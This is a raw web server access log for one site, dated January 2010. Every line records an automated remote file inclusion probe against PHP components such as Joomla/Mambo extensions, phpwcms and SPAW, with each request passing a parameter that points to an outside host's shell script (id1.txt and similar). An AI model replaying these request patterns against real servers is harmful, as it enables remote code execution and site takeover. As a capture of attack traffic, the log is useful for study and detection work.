194.110.160.78 - - [31/Jan/2010:21:35:26 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:21:35:26 -0800] "GET /logs/access_100118.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:21:35:26 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:36:16 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:36:16 -0800] "GET /logs/access.log%20%20//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:36:16 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:37:29 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:37:29 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:37:29 -0800] "GET /logs/access.log%20%20//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.94.239.177 - - [31/Jan/2010:21:45:15 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.94.239.177 - - [31/Jan/2010:21:45:15 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.94.239.177 - - [31/Jan/2010:21:45:15 -0800] "GET /logs/access_090803.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:21:45:34 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:21:45:34 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:21:45:35 -0800] "GET /logs/access_090914.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [31/Jan/2010:21:45:35 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [31/Jan/2010:21:45:35 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [31/Jan/2010:21:45:35 -0800] "GET /logs/access_090810.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [31/Jan/2010:21:45:38 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [31/Jan/2010:21:45:38 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [31/Jan/2010:21:45:38 -0800] "GET /logs/access_090810.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [31/Jan/2010:21:46:13 -0800] "GET /logs/access_091026.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [31/Jan/2010:21:46:27 -0800] "GET /logs/access_091026.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.94.239.177 - - [31/Jan/2010:21:47:05 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.94.239.177 - - [31/Jan/2010:21:47:05 -0800] "GET /logs/access_091012.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.94.239.177 - - [31/Jan/2010:21:47:05 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.94.239.177 - - [31/Jan/2010:21:47:13 -0800] "GET /logs/access_090803.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.94.239.177 - - [31/Jan/2010:21:47:23 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.94.239.177 - - [31/Jan/2010:21:47:23 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.94.239.177 - - [31/Jan/2010:21:47:23 -0800] "GET /logs/access_091012.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.94.239.177 - - [31/Jan/2010:21:47:31 -0800] "GET /logs/access_090803.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.94.239.177 - - [31/Jan/2010:21:47:39 -0800] "GET /logs/access_090803.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.94.239.177 - - [31/Jan/2010:21:47:39 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.94.239.177 - - [31/Jan/2010:21:47:39 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:51:15 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:51:18 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:52:22 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:52:22 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:52:22 -0800] "GET /logs/access_090907.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:21:52:34 -0800] "GET /logs/access_100118.log%20%20/?sourcedir=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:21:52:34 -0800] "GET /logs/access_090831.log%20%20/?sourcedir=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:21:52:34 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:21:52:34 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:21:52:39 -0800] "GET /logs/access_100118.log%20%20/?sourcedir=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:21:52:39 -0800] "GET /logs/access_090831.log%20%20/?sourcedir=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:21:52:39 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:21:52:39 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
201.24.87.113 - - [31/Jan/2010:21:53:10 -0800] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:54:08 -0800] "GET /logs/scripts.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:54:11 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:54:11 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:54:20 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:54:20 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
59.126.78.99 - - [31/Jan/2010:21:54:54 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
59.126.78.99 - - [31/Jan/2010:21:54:54 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
59.126.78.99 - - [31/Jan/2010:21:54:54 -0800] "GET /logs/access_090706.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:55:55 -0800] "GET /logs/access_090706.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:56:28 -0800] "GET /logs/scripts.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:57:10 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [31/Jan/2010:21:57:10 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [31/Jan/2010:21:57:10 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [31/Jan/2010:21:57:11 -0800] "GET /logs/access_091026.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:57:13 -0800] "GET /logs/scripts.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:57:13 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [31/Jan/2010:21:57:13 -0800] "GET /logs/access_091116.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [31/Jan/2010:21:57:15 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [31/Jan/2010:21:57:15 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [31/Jan/2010:21:57:15 -0800] "GET /logs/access_091026.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [31/Jan/2010:21:57:19 -0800] "GET /logs/access_091116.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:21:57:40 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:21:57:40 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:21:57:40 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:21:57:52 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:21:57:52 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:21:57:52 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:58:11 -0800] "GET /logs/scripts.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:58:14 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:58:14 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:58:20 -0800] "GET /logs/access_090706.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
59.126.78.99 - - [31/Jan/2010:21:59:01 -0800] "GET /logs/scripts.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:59:18 -0800] "GET /logs/scripts.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:59:51 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:59:51 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:59:51 -0800] "GET /logs/access_090907.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:21:59:51 -0800] "GET /logs/access_091228.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:00:31 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:00:31 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:00:31 -0800] "GET /logs/access_090720.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:01:34 -0800] "GET /logs/access_090706.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:01:49 -0800] "GET /logs/access_090706.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.24.87.113 - - [31/Jan/2010:22:03:25 -0800] "GET /logs/access_091207.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:06:44 -0800] "GET /logs/scripts.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:08:05 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:08:05 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:08:05 -0800] "GET /logs/access_090907.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:08:05 -0800] "GET /logs/access_091228.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:08:10 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:08:10 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:08:10 -0800] "GET /logs/access_091228.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:08:13 -0800] "GET /logs/access_090907.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:09:13 -0800] "GET /logs/scripts.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:09:44 -0800] "GET /logs/access_090706.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:10:54 -0800] "GET /logs/scripts.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:10:54 -0800] "GET /logs/access_090706.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:10:56 -0800] "GET /logs/access_090706.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:11:22 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:11:22 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:11:22 -0800] "GET /logs/access_090907.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:11:47 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:11:47 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:11:47 -0800] "GET /logs/access_090907.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:22:11:47 -0800] "GET /logs/access_091228.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
